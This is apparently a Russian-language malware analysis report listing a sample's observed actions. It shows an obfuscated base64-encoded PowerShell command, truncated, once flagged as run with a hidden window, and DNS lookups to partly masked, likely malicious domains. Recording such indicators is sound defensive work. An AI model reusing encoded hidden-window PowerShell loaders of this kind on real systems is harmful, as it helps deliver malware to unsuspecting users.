Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAGIAdwB6AG4AYgB1AHEAcQB4AG4APQAnAFYAawB2AG8AcwB2AGwAeABjAHoAbQBxAG8AJwA7ACQATwByAGIAbQBqAGUAagBrAC...
- DNS ASK sh#####nkebihari.com
- DNS ASK ba##tml.com
- DNS ASK tr#######nstituteahmedabad.com
- DNS ASK al#####indowsystems.com
- DNS ASK vn#######c.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAGIAdwB6AG4AYgB1AHEAcQB4AG4APQAnAFYAawB2AG8AcwB2AGwAeABjAHoAbQBxAG8AJwA7ACQATwByAGIAbQBqAGUAagBrAC...' (со скрытым окном)